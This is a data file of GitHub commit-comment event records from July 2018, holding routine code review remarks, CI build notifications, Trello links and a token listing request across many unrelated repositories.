{"id":"7999615750","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"atomiclabs/hyperdex"},"payload":{"comment":{"id":29790995,"position":null,"line":null,"path":null,"commit_id":"31d55a73254bacbcd8e90024ed698d15a26a5673","created_at":"2018-07-22T04:29:32Z","updated_at":"2018-07-22T04:29:32Z","author_association":"MEMBER","body":"I don't feel strongly about it, but it's kinda weird to not use the official symbol name. We would also have to do a workaround since our CMC fetching would not match `PAC`. @lukechilds Thoughts?"}},"created_at":"2018-07-22T04:29:32Z"}
{"id":"7999616173","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790996,"position":null,"line":null,"path":null,"commit_id":"19b80848ccf75859677c039fa4172b30ef547db2","created_at":"2018-07-22T04:29:57Z","updated_at":"2018-07-22T04:29:57Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1699 of 1699 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-22T04:29:57Z"}
{"id":"7999616540","type":"CommitCommentEvent","actor":{"login":"mathsanu"},"repo":{"name":"mathsanu/CUNY_MSDA"},"payload":{"comment":{"id":29790999,"position":null,"line":null,"path":null,"commit_id":"511177c310f289ba11815231461d3ce7e0b7fb2c","created_at":"2018-07-22T04:30:16Z","updated_at":"2018-07-22T04:30:16Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-22T04:30:16Z"}
{"id":"7999616644","type":"CommitCommentEvent","actor":{"login":"doug-salvati"},"repo":{"name":"doug-salvati/Brick-Collector"},"payload":{"comment":{"id":29791001,"position":16,"line":15,"path":"src/components/dialogs/AddPart/AddPart.js","commit_id":"53d79663415b188db5b091508ea9fdd95cbce126","created_at":"2018-07-22T04:30:22Z","updated_at":"2018-07-22T04:30:22Z","author_association":"OWNER","body":"not an actual API key"}},"created_at":"2018-07-22T04:30:22Z"}
{"id":"7999617290","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29791002,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-22T04:31:04Z","updated_at":"2018-07-22T04:31:04Z","author_association":"CONTRIBUTOR","body":"I am sorry but I am not able feel productivity from the discussion on this thread.\r\nIt is obvious that your last commnet will work\r\n“Make `RD_header()` read the `RD_hdr_t` structure, as in `RD_header(in, &hdr, verbos)`”\r\nas I mention in my comment\r\n“Alternative could be changing the RD_header() to make it return to the caller of entire RD_hdr_t.”\r\nAnd this method will require more line changes as I mention in my comment.\r\n\r\nIs there any reason you started this thread with \r\n“Why the extra variable and the extra argument?\r\nThe start is present in the header, just use it.”\r\nAnd not from “Make `RD_header()` read the `RD_hdr_t` structure, as in `RD_header(in, &hdr, verbos)`”?\r\n\r\nAlso, your last comment do not seem to match with your other comments \r\n\"Why do we need a new variable for this?\r\nThe RD_hdr_t has a `start` field.\"\r\n“It's in rtpplay.c, line 261 above.”\r\nBecause your last comment will also require adding variable with type RD_hdr_t in rtpplay.c to avoid build error similar as line 261 in rtpplay.c.\r\nAlso, \r\nIf you wanted to change “Make `RD_header()` read the `RD_hdr_t` structure, as in `RD_header(in, &hdr, verbos)`” way then you could have created a patch by yourself or just add the comment on the https://github.com/columbia-irt/rtptools/issues/125.\r\n\r\nI am maintaining rtptools in my limited spare time and productivity is important.\r\nYou may reply any comments.\r\nI am sorry but I will stop responding this topic and I am going forward to other items. "}},"created_at":"2018-07-22T04:31:04Z"}
{"id":"7999617517","type":"CommitCommentEvent","actor":{"login":"charithnik1993"},"repo":{"name":"charithnik1993/Loose-Coupling"},"payload":{"comment":{"id":29791003,"position":36,"line":45,"path":"Loose-Coupling/Loose-Coupling/Program.cs","commit_id":"2f37cc351707b22589d52047a4f160c536727c55","created_at":"2018-07-22T04:31:17Z","updated_at":"2018-07-22T04:31:17Z","author_association":"OWNER","body":"catcher service contains a more abstract ICatcher attribute which accepts all the object which implements ICatcher interface."}},"created_at":"2018-07-22T04:31:17Z"}
{"id":"7999617966","type":"CommitCommentEvent","actor":{"login":"charithnik1993"},"repo":{"name":"charithnik1993/Loose-Coupling"},"payload":{"comment":{"id":29791004,"position":35,"line":44,"path":"Loose-Coupling/Loose-Coupling/Program.cs","commit_id":"2f37cc351707b22589d52047a4f160c536727c55","created_at":"2018-07-22T04:31:46Z","updated_at":"2018-07-22T04:31:46Z","author_association":"OWNER","body":"catcher service contains a more abstract ICatcher attribute which accepts all the object which implements ICatcher interface."}},"created_at":"2018-07-22T04:31:46Z"}
{"id":"7999619204","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29791006,"position":null,"line":null,"path":null,"commit_id":"6456ec2d99d7419fba1312a63ba6ca399638026c","created_at":"2018-07-22T04:33:00Z","updated_at":"2018-07-22T04:33:00Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.363`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406742020) :tada:"}},"created_at":"2018-07-22T04:33:00Z"}
{"id":"7999631232","type":"CommitCommentEvent","actor":{"login":"Subv"},"repo":{"name":"DarkLordZach/yuzu"},"payload":{"comment":{"id":29791026,"position":5,"line":18,"path":"src/core/file_sys/mode.h","commit_id":"dcefa2a2ea2e53643f67006f8f9d26e0688a2785","created_at":"2018-07-22T04:46:23Z","updated_at":"2018-07-22T04:46:23Z","author_association":"NONE","body":"just add ReadWrite = 3 to Mode"}},"created_at":"2018-07-22T04:46:23Z"}
{"id":"7999631568","type":"CommitCommentEvent","actor":{"login":"JaoTheFreak"},"repo":{"name":"JaoTheFreak/Projeto-Votos-Faculdade-Bagozzi"},"payload":{"comment":{"id":29791028,"position":null,"line":null,"path":null,"commit_id":"d91008018279fd0b2ccdb26ad153c478e1660f29","created_at":"2018-07-22T04:46:48Z","updated_at":"2018-07-22T04:46:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar estrutura inicial da Aplicação](https://trello.com/c/YV4X7zc5/3-criar-estrutura-inicial-da-aplica%C3%A7%C3%A3o)"}},"created_at":"2018-07-22T04:46:48Z"}
{"id":"7999631670","type":"CommitCommentEvent","actor":{"login":"JaoTheFreak"},"repo":{"name":"JaoTheFreak/Projeto-Votos-Faculdade-Bagozzi"},"payload":{"comment":{"id":29791029,"position":null,"line":null,"path":null,"commit_id":"b5ac0287bf5cde15c109f21c2a5e928727a2877f","created_at":"2018-07-22T04:46:54Z","updated_at":"2018-07-22T04:46:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar estrutura inicial da Aplicação](https://trello.com/c/YV4X7zc5/3-criar-estrutura-inicial-da-aplica%C3%A7%C3%A3o)"}},"created_at":"2018-07-22T04:46:54Z"}
{"id":"7999632911","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29791031,"position":null,"line":null,"path":null,"commit_id":"5d96782e92a31c74e11d8bf68edfbebb4c453a46","created_at":"2018-07-22T04:48:20Z","updated_at":"2018-07-22T04:48:20Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 549](https://ci.hashicorp.engineering/viewLog.html?buildId=105843&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-22T04:48:20Z"}
{"id":"7999633171","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29791032,"position":null,"line":null,"path":null,"commit_id":"5d96782e92a31c74e11d8bf68edfbebb4c453a46","created_at":"2018-07-22T04:48:39Z","updated_at":"2018-07-22T04:48:39Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 549](https://ci.hashicorp.engineering/viewLog.html?buildId=105843&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:18"}},"created_at":"2018-07-22T04:48:39Z"}
{"id":"7999633172","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29791033,"position":null,"line":null,"path":null,"commit_id":"5d96782e92a31c74e11d8bf68edfbebb4c453a46","created_at":"2018-07-22T04:48:39Z","updated_at":"2018-07-22T04:48:39Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 550](https://ci.hashicorp.engineering/viewLog.html?buildId=105844&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-22T04:48:39Z"}
{"id":"7999633386","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29791034,"position":null,"line":null,"path":null,"commit_id":"5d96782e92a31c74e11d8bf68edfbebb4c453a46","created_at":"2018-07-22T04:48:54Z","updated_at":"2018-07-22T04:48:54Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 550](https://ci.hashicorp.engineering/viewLog.html?buildId=105844&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:15"}},"created_at":"2018-07-22T04:48:54Z"}
{"id":"7999634654","type":"CommitCommentEvent","actor":{"login":"Subv"},"repo":{"name":"DarkLordZach/yuzu"},"payload":{"comment":{"id":29791035,"position":16,"line":33,"path":"src/core/file_sys/vfs_real.h","commit_id":"758ce26e4b33e5ee4ae4284d4dfbdcaa50d60d81","created_at":"2018-07-22T04:50:22Z","updated_at":"2018-07-22T04:50:22Z","author_association":"NONE","body":"why is this const?"}},"created_at":"2018-07-22T04:50:22Z"}
{"id":"7999634759","type":"CommitCommentEvent","actor":{"login":"Subv"},"repo":{"name":"DarkLordZach/yuzu"},"payload":{"comment":{"id":29791036,"position":18,"line":35,"path":"src/core/file_sys/vfs_real.h","commit_id":"758ce26e4b33e5ee4ae4284d4dfbdcaa50d60d81","created_at":"2018-07-22T04:50:28Z","updated_at":"2018-07-22T04:50:28Z","author_association":"NONE","body":"pls no mutable"}},"created_at":"2018-07-22T04:50:28Z"}
{"id":"7999640106","type":"CommitCommentEvent","actor":{"login":"Articulas"},"repo":{"name":"Articulas/redneckracing"},"payload":{"comment":{"id":29791042,"position":null,"line":null,"path":null,"commit_id":"e3098bb4f5243830dd4afdf206fd869f6bec82a3","created_at":"2018-07-22T04:56:24Z","updated_at":"2018-07-22T04:56:24Z","author_association":"OWNER","body":"This is where we added multiple obstacles. More to come."}},"created_at":"2018-07-22T04:56:24Z"}
{"id":"7999640619","type":"CommitCommentEvent","actor":{"login":"renahnschultz"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29791043,"position":null,"line":null,"path":null,"commit_id":"9f4ac40c0fba6c2dacfa886facac39d3a122757e","created_at":"2018-07-22T04:56:52Z","updated_at":"2018-07-22T04:56:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro de Paciente](https://trello.com/c/KrglObWY/2-cadastro-de-paciente)"}},"created_at":"2018-07-22T04:56:52Z"}
{"id":"7999642426","type":"CommitCommentEvent","actor":{"login":"NKONSTANTAKIS"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29791049,"position":null,"line":null,"path":null,"commit_id":"b39cf725b3276338a6f921556d32596f8f91bbe4","created_at":"2018-07-22T04:59:02Z","updated_at":"2018-07-22T04:59:02Z","author_association":"NONE","body":"I have noticed this problem from long ago in many seasons of TCEC, it seemed a rare occurance. However now I regard that its just the disaster which is rare, common being the clogging effect. So by fixing it possibly it does not only solve special cases, but its liberating the search in general."}},"created_at":"2018-07-22T04:59:02Z"}
{"id":"7999652552","type":"CommitCommentEvent","actor":{"login":"V-ed"},"repo":{"name":"Vhoyon/Discord-Bot"},"payload":{"comment":{"id":29791064,"position":null,"line":null,"path":null,"commit_id":"2b377500c7547ca14bc5eb324cdc4002afa0f54c","created_at":"2018-07-22T05:08:54Z","updated_at":"2018-07-22T05:08:54Z","author_association":"COLLABORATOR","body":"Instead of flooring it*\n\nGood love little commit typos :)"}},"created_at":"2018-07-22T05:08:54Z"}
{"id":"7999653327","type":"CommitCommentEvent","actor":{"login":"deepu2010"},"repo":{"name":"ngavrish/coursera-machine-learning-1"},"payload":{"comment":{"id":29791066,"position":30,"line":30,"path":"mlclass-ex3/predict.m","commit_id":"3a7958f1a4c0ecc5ac8766f038065316735159aa","created_at":"2018-07-22T05:09:40Z","updated_at":"2018-07-22T05:09:40Z","author_association":"NONE","body":"Hello Sir,\r\n\r\nz2 = sigmoid(X(j,:) * Theta1');\r\n\r\n\r\nWhy its not X*theta but X(j,:)*theta1'? please explain me.....would be much helpful.\r\n\r\nThank you in advance. :)"}},"created_at":"2018-07-22T05:09:40Z"}
{"id":"7999654392","type":"CommitCommentEvent","actor":{"login":"Inoovi"},"repo":{"name":"forkdelta/tokenbase"},"payload":{"comment":{"id":29791067,"position":null,"line":null,"path":null,"commit_id":"2fa6e6533ed58458236a558879ae484022b4fdaf","created_at":"2018-07-22T05:10:46Z","updated_at":"2018-07-22T05:10:46Z","author_association":"NONE","body":"Request Token listing : \r\n\r\nToken Name : INOOVI\r\nToken Symbol : IVI\r\n\r\nContract Adress : 0xa91464abd4625a23ab719e3f0fce84dadd54e546\r\nDecimal : 18\r\n\r\nWebsite : https://infinivi.io\r\nDiscovering IVI : http://infinivi.io/discoverivi/\r\nWhite Paper : http://infinivi.io/#white-paper\r\n\r\nBitcointalk : https://bitcointalk.org/index.php?topic=4714395.0\r\nGithub : https://github.com/Inoovi\r\n\r\nPress and Media official release : \r\n\r\nIn Portuguese :\r\n\r\nhttps://youtu.be/MavX4WcO-q0\r\n\r\nhttps://youtu.be/-_d8ppivYaQ\r\n\r\nIn French :\r\n\r\nhttps://youtu.be/E8tp-ig9yL4\r\n\r\nhttps://youtu.be/0VK1aZF7NC8\r\n\r\nA Part of Press and media official release :\r\n\r\nhttps://cryptonomist.ch/en/blockchain-en/interview/football-startup/\r\n\r\nhttp://www.tradingcrypto.eu/bitcoin/brazilian-football-teams-ink-partnerships-with-crypto-startup-inoovi/\r\n\r\nhttps://www.barocrypto.com/inoovi-des-clubs-de-foot-bresilien-feront-la-promo-du-token-ivi-m297\r\n\r\nhttps://brazilreports.com/brazilian-football-teams-form-partnership-with-crypto-startup-inoovi/\r\n\r\nhttps://latam.tech/2018/07/06/brazilian-football-teams-form-partnership-with-crypto-startup-inoovi/\r\n\r\nhttps://globoesporte.globo.com/pr/futebol/times/atletico-pr/noticia/com-novo-patrocinador-atletico-pr-planeja-pagar-salarios-com-moeda-virtual.ghtml\r\n\r\nhttps://www.bemparana.com.br/noticia/atletico-divulga-patrocinador-e-planeja-pagar-salarios-com-moeda-virtual\r\n\r\nhttps://www.canardcoincoin.com/atletico-pr-et-corinthians-sassocient-avec-inoovi/\r\n\r\nhttps://cryptopys.com/2018/06/29/clube-atletico-paranaense-revela-planos-de-pagar-salarios-com-criptomoedas/\r\n\r\nhttps://www.gazetadopovo.com.br/esportes/atletico-pr/atletico-anuncia-parceria-com-empresa-francesa-de-moeda-virtual-0p3da0noevpzl4q3gmxd9lmsa\r\n\r\nhttps://www.tribunapr.com.br/esportes/atletico/atletico-lanca-parceria-envolvendo-moeda-virtual/\r\n\r\nhttp://www.mktesportivo.com/2018/06/atletico-pr-anuncia-inovadora-parceria-no-futebol-brasileiro/\r\n\r\nhttps://www.criptomoedasfacil.com/clube-atletico-paranaense-revela-planos-de-pagar-salarios-com-criptomoedas/\r\n\r\nhttp://www.espn.com.br/futebol/artigo/_/id/4482652/atletico-pr-com-novo-patrocinador-clube-planeja-pagar-salarios-em-moeda-virtual\r\n\r\nhttps://paranaportal.uol.com.br/esportes/atletico-pr-entra-no-negocio-de-criptomoedas/\r\n\r\nhttps://www.meutimao.com.br/forum-do-corinthians/mercado-da-bola/515212/exclusivo\r\n\r\nhttps://www.altcoinstalks.com/index.php?topic=6215.0\r\n\r\nhttps://www.coindiary.net/amp/ivi-the-future-of-sports/\r\n\r\nhttps://forum.stake.com/topic/9297-ann-infinivi-ivi-worldwide-football-sports-stars-based-unique/\r\n\r\nhttps://www.google.com.hk/amp/s/portaldobitcoin.com/atletico-pr-corinthians-parceria-startup-criptomoedas/amp/\r\n\r\nhttps://netbusinessrating.com/en/review-26784-inoovi\r\n\r\nhttps://icotracker.net/project/inoovi_io\r\n\r\nhttps://icoslot.com/en/ico/inoovi/\r\n\r\nhttps://www.marketbeat.com/cryptocurrencies/icos/inoovi/\r\n\r\n\r\n\r\nLinkedin of IVI President and CEO :\r\n\r\nhttps://fr.linkedin.com/in/fernand-danan-66762a10"}},"created_at":"2018-07-22T05:10:46Z"}
{"id":"7999660589","type":"CommitCommentEvent","actor":{"login":"jahmai"},"repo":{"name":"xamarin/GooglePlayServicesComponents"},"payload":{"comment":{"id":29791080,"position":null,"line":null,"path":null,"commit_id":"000969c277fced2921098543481b22f615ff6714","created_at":"2018-07-22T05:17:23Z","updated_at":"2018-07-22T05:17:23Z","author_association":"NONE","body":"This change breaks building in Visual Studio. After updating from 61.1142.0 to 61.1142.1, I get heaps of proguard errors such as:\r\n\r\nPROGUARD com.google.android.gms.internal.zzak: can't find referenced class org.apache.http.client.methods.HttpHead\r\n\r\nIf I revery this change by replacing the target with the previous version in my .csproj after including this targets file, then it builds fine again."}},"created_at":"2018-07-22T05:17:23Z"}
{"id":"7999661032","type":"CommitCommentEvent","actor":{"login":"chenzuo"},"repo":{"name":"chenzuo/uWebSockets"},"payload":{"comment":{"id":29791081,"position":null,"line":null,"path":null,"commit_id":"f9bc5a64892e791096fd1d33362aaca956c3c62b","created_at":"2018-07-22T05:17:51Z","updated_at":"2018-07-22T05:17:51Z","author_association":"OWNER","body":"可以的可以的"}},"created_at":"2018-07-22T05:17:51Z"}
{"id":"7999661864","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29791085,"position":null,"line":null,"path":null,"commit_id":"375427dcee1f354ea7b0171ac3a584bd7a85a2e2","created_at":"2018-07-22T05:18:43Z","updated_at":"2018-07-22T05:18:43Z","author_association":"MEMBER","body":"The snap change is unrelated to that - it's a side effect of fixing the issue that caused PC screens to disappear if you plug in an Epson LX800 printer.  These systems have a screen, so MAME is now defaulting to the first view that shows it.  If the screen isn't really present, it should be removed (or added with a slot device or something).  If the screen should be hidden by default, a layout trick should be used to achieve this."}},"created_at":"2018-07-22T05:18:43Z"}
{"id":"7999663613","type":"CommitCommentEvent","actor":{"login":"kayeZhie"},"repo":{"name":"kayeZhie/Arcade-Game"},"payload":{"comment":{"id":29791088,"position":null,"line":null,"path":null,"commit_id":"59f983bcd762a8a8343cd69a12783d905f37f97c","created_at":"2018-07-22T05:20:37Z","updated_at":"2018-07-22T05:20:37Z","author_association":"OWNER","body":"good! final README."}},"created_at":"2018-07-22T05:20:37Z"}
{"id":"7999665460","type":"CommitCommentEvent","actor":{"login":"cipig"},"repo":{"name":"atomiclabs/hyperdex"},"payload":{"comment":{"id":29791092,"position":null,"line":null,"path":null,"commit_id":"31d55a73254bacbcd8e90024ed698d15a26a5673","created_at":"2018-07-22T05:22:37Z","updated_at":"2018-07-22T05:22:37Z","author_association":"NONE","body":"autoprice call in mm (which uses CMC v1 API) uses part of the URL to identify the coins on CMC, not the coin symbols. CMC v2 API and CMC paid API use ids to identify the coins. I have collected this ids: https://github.com/cipig/mmtools/blob/master/setprices/margins.conf and use them for my own price update script for CMC paid API."}},"created_at":"2018-07-22T05:22:37Z"}
{"id":"7999673235","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"d3sandoval/openemr-devops"},"payload":{"comment":{"id":29791110,"position":null,"line":null,"path":null,"commit_id":"4d8b95b0fea8a368f66f15ca5212f54967757a0a","created_at":"2018-07-22T05:30:54Z","updated_at":"2018-07-22T05:30:54Z","author_association":"NONE","body":"Except for the non-empty vendor directory, this looks really good. So I am assuming this means developers will run the following command set to build their local openemr (if not using flex docker stuff):\r\n```composer install\r\nnpm install\r\nnpm build```\r\n(If so, then this is definitely feasible for developers (even new developers) to set up composer/npm and run these commands)\r\n"}},"created_at":"2018-07-22T05:30:54Z"}
{"id":"7999673394","type":"CommitCommentEvent","actor":{"login":"milo2012"},"repo":{"name":"milo2012/pathbrute"},"payload":{"comment":{"id":29791111,"position":null,"line":null,"path":null,"commit_id":"333307aa9122e791afbed362fc3417d902887b34","created_at":"2018-07-22T05:31:05Z","updated_at":"2018-07-22T05:31:05Z","author_association":"OWNER","body":"Reference to request #5 "}},"created_at":"2018-07-22T05:31:05Z"}
{"id":"7999674863","type":"CommitCommentEvent","actor":{"login":"palehrsm3n"},"repo":{"name":"DesignativeDave/androrat"},"payload":{"comment":{"id":29791120,"position":1,"line":1,"path":"androrat","commit_id":"885c52e72dc0431636d63d60d109139574ff3acf","created_at":"2018-07-22T05:32:37Z","updated_at":"2018-07-22T05:32:37Z","author_association":"NONE","body":"How do I run this\r\n"}},"created_at":"2018-07-22T05:32:37Z"}
{"id":"7999675391","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29791122,"position":null,"line":null,"path":null,"commit_id":"b27d9cded44b2141fc722a9fe180d6f10b148d28","created_at":"2018-07-22T05:33:13Z","updated_at":"2018-07-22T05:33:13Z","author_association":"NONE","body":"This issue should have been resolved with the mvn clean test command I posted in slack. Switching back to the user.dir will avoid any static paths hardcoded. "}},"created_at":"2018-07-22T05:33:13Z"}
{"id":"7999675967","type":"CommitCommentEvent","actor":{"login":"houweidong"},"repo":{"name":"houweidong/learngit"},"payload":{"comment":{"id":29791127,"position":null,"line":null,"path":null,"commit_id":"9fbab153835267b02a1ef7a3463c844506598de2","created_at":"2018-07-22T05:33:49Z","updated_at":"2018-07-22T05:33:49Z","author_association":"OWNER","body":"please!"}},"created_at":"2018-07-22T05:33:49Z"}
{"id":"7999676627","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29791132,"position":9,"line":9,"path":"internal/core/src/test/kotlin/org.nve/domain/InvoiceTest.kt","commit_id":"cadb93fb6365c9b0f20898eec55c2cf69a4d80ca","created_at":"2018-07-22T05:34:38Z","updated_at":"2018-07-22T05:34:38Z","author_association":"NONE","body":"Make sure to add the powermock runner and the prepare company annotations. "}},"created_at":"2018-07-22T05:34:38Z"}
{"id":"7999677688","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29791134,"position":15,"line":15,"path":"internal/core/src/test/kotlin/org.nve/domain/InvoiceTest.kt","commit_id":"cadb93fb6365c9b0f20898eec55c2cf69a4d80ca","created_at":"2018-07-22T05:35:55Z","updated_at":"2018-07-22T05:35:55Z","author_association":"NONE","body":"We should use the hamkrest assertions and matchers for this. We also probably want to validate that the class isn't null. "}},"created_at":"2018-07-22T05:35:55Z"}
{"id":"7999678350","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29791139,"position":23,"line":23,"path":"internal/core/src/test/kotlin/org.nve/domain/InvoiceTest.kt","commit_id":"cadb93fb6365c9b0f20898eec55c2cf69a4d80ca","created_at":"2018-07-22T05:36:36Z","updated_at":"2018-07-22T05:36:36Z","author_association":"NONE","body":"Same here, we should use hamkrest and be asserting that the instantiation was successful rather than the object is an instance of the class we declared. "}},"created_at":"2018-07-22T05:36:36Z"}
{"id":"7999679291","type":"CommitCommentEvent","actor":{"login":"tramstheman"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29791141,"position":7,"line":6,"path":"internal/core/src/main/kotlin/org/nve/domain/Invoice.kt","commit_id":"af39a783dada9e57913ec0a3f3ca4b2c6b5df89e","created_at":"2018-07-22T05:37:49Z","updated_at":"2018-07-22T05:37:49Z","author_association":"NONE","body":"This should be a lazy value instead of a function. "}},"created_at":"2018-07-22T05:37:49Z"}
{"id":"7999680262","type":"CommitCommentEvent","actor":{"login":"TynanSylvester"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29791142,"position":null,"line":null,"path":null,"commit_id":"afa3f87156d831924a32f04401d2fc38d192f4c4","created_at":"2018-07-22T05:38:54Z","updated_at":"2018-07-22T05:38:54Z","author_association":"CONTRIBUTOR","body":"This translation is too long, it won't fit in the area allowed (it's a stat label on the stats screen within the \"i\" button)."}},"created_at":"2018-07-22T05:38:54Z"}
{"id":"7999680464","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29791143,"position":null,"line":null,"path":null,"commit_id":"9a68521232fb372b4bab21a2f3caff85a580e05d","created_at":"2018-07-22T05:39:10Z","updated_at":"2018-07-22T05:39:10Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 551](https://ci.hashicorp.engineering/viewLog.html?buildId=105846&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-22T05:39:10Z"}
{"id":"7999680938","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29791146,"position":null,"line":null,"path":null,"commit_id":"9a68521232fb372b4bab21a2f3caff85a580e05d","created_at":"2018-07-22T05:39:44Z","updated_at":"2018-07-22T05:39:44Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 551](https://ci.hashicorp.engineering/viewLog.html?buildId=105846&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:34"}},"created_at":"2018-07-22T05:39:44Z"}
{"id":"7999683965","type":"CommitCommentEvent","actor":{"login":"Awsome-Areej"},"repo":{"name":"Awsome-Areej/Python-Jokes"},"payload":{"comment":{"id":29791149,"position":null,"line":null,"path":null,"commit_id":"4c0aad18e0cbda877bc9ac9dc8af59bf4219da21","created_at":"2018-07-22T05:43:01Z","updated_at":"2018-07-22T05:43:01Z","author_association":"OWNER","body":"Knock Knock\r\nWho's there\r\nTry\r\nTry who\r\nTry this code now!"}},"created_at":"2018-07-22T05:43:01Z"}
{"id":"7999684158","type":"CommitCommentEvent","actor":{"login":"brian-mann"},"repo":{"name":"cypress-io/cypress"},"payload":{"comment":{"id":29791150,"position":null,"line":null,"path":null,"commit_id":"06b59bebd960dd4bc92ac597e960333bfcf71aff","created_at":"2018-07-22T05:43:15Z","updated_at":"2018-07-22T05:43:15Z","author_association":"MEMBER","body":"I'm going to have to look at why this is and why it all of a sudden starting failing"}},"created_at":"2018-07-22T05:43:15Z"}
{"id":"7999684534","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29791151,"position":null,"line":null,"path":null,"commit_id":"19b80848ccf75859677c039fa4172b30ef547db2","created_at":"2018-07-22T05:43:43Z","updated_at":"2018-07-22T05:43:43Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2327 of 2327 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-22T05:43:43Z"}
